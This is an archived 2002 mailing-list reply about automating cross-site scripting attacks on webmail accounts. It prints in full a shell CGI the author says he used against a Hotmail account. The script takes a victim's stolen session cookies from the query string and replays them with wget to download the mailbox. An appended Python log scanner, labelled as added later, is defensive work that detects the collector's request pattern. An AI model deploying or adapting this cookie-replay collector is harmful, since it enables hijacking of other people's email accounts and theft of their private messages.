Great! This article is a very good explanation of how to set up an attack against web apps by using XSS. However, it is not really a "prediction" of a new type of attack: several people (including me ;) have pointed out in the past on this mailing-list that attacks against webmails can be easily automated by a script.

Here is a very lame shell CGI I used for a pen test against a Hotmail account:

$ cat /var/www/cgi-bin/recupmail.cgi
#!/bin/sh
echo Content-type: text/plain
echo
set -f
URL=`echo $QUERY_STRING | cut -d '*' -f 1 | cut -d '&' -f -2`
URL_MESSAGE=`echo $QUERY_STRING | cut -d '*' -f 1`
COOKIES=`echo $QUERY_STRING | cut -d '*' -f 2 | /usr/local/sbin/urldecode.sh`
echo URL = $URL
echo COOKIES = $COOKIES
cd /home/fozzy/tmp/hotmail
nohup wget -b --user-agent='Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; BVRP Software)' -r -l 1 -o /tmp/recupmail.log --header="Cookie: $COOKIES" -nd $URL &
nohup wget -b --user-agent='Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; BVRP Software)' -r -l 1 -o /tmp/recupmail.log --header="Cookie: $COOKIES" -nd $URL_MESSAGE &

I also used PHP scripts to prove that I could crack into my accounts on many French webmails 7 months ago. Everything was published in a French newspaper (Hackerz Voice) but I did not put it on the web because I fear script-kiddies, and the code is not really interesting (it is quite straight-forward).

If I was able to do that, surely many other people did the same thing. So, I am sure it has been exploited "in the wild" for a long time. :(

BTW, two weeks ago, Hotmail and Yahoo were still vulnerable to XSS...

FozZy

Hackademy / Hackerz Voice
http://www.dmpfrance.com
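Added example, not part of the original post: a defender-side check that scans web proxy or server access log lines for the request shape the CGI above consumes, i.e. a query string with a URL-encoded cookie string after a `*` delimiter. The log lines, hosts, paths and cookie names are constructed for illustration, and only cookie names are reported so session values are not copied into alerts.

```python
import re
from urllib.parse import unquote

# Request line inside a common/combined-format access log entry.
LOG_LINE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')
# Shape of a Cookie header value: name=value pairs separated by ';'.
COOKIE_SHAPE = re.compile(r"^\s*[\w.-]+=[^;\s]*(?:;\s*[\w.-]+=[^;\s]*)*;?\s*$")


def cookie_payload(target):
    """Return decoded cookie-like text found after '*' in the query, else None."""
    _, sep, query = target.partition("?")
    if not sep or "*" not in query:
        return None
    # Same field the posted script takes with: cut -d '*' -f 2
    tail = unquote(query.split("*")[1])
    return tail if COOKIE_SHAPE.match(tail) else None


def scan(lines):
    """Return (line_number, [cookie names]) for each suspicious request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = LOG_LINE.search(line)
        if not match:
            continue
        payload = cookie_payload(match.group("target"))
        if payload:
            names = [p.split("=", 1)[0].strip()
                     for p in payload.split(";") if "=" in p]
            hits.append((number, names))
    return hits


# Constructed sample log (documentation addresses and .test hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/May/2002:10:00:00 +0000] "GET /index.html HTTP/1.0" 200 512',
    '192.0.2.10 - - [20/May/2002:10:00:03 +0000] "GET /cgi-bin/collect.cgi?'
    'http://mail.example.test/inbox&folder=1*SESSID%3Dabc123%3B%20lang%3Dfr'
    ' HTTP/1.0" 200 57',
    '192.0.2.11 - - [20/May/2002:10:00:05 +0000] "GET /search?q=foo*bar HTTP/1.0" 200 90',
]

if __name__ == "__main__":
    for number, names in scan(SAMPLE_LOG):
        print(f"line {number}: cookie-like data in query string, names={names}")
```

A single `name=value` pair after `*` also matches, so expect some noise on applications that legitimately use `*` in query strings.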
This archive was generated by hypermail 2b30 : Mon May 20 2002 - 18:18:28 PDT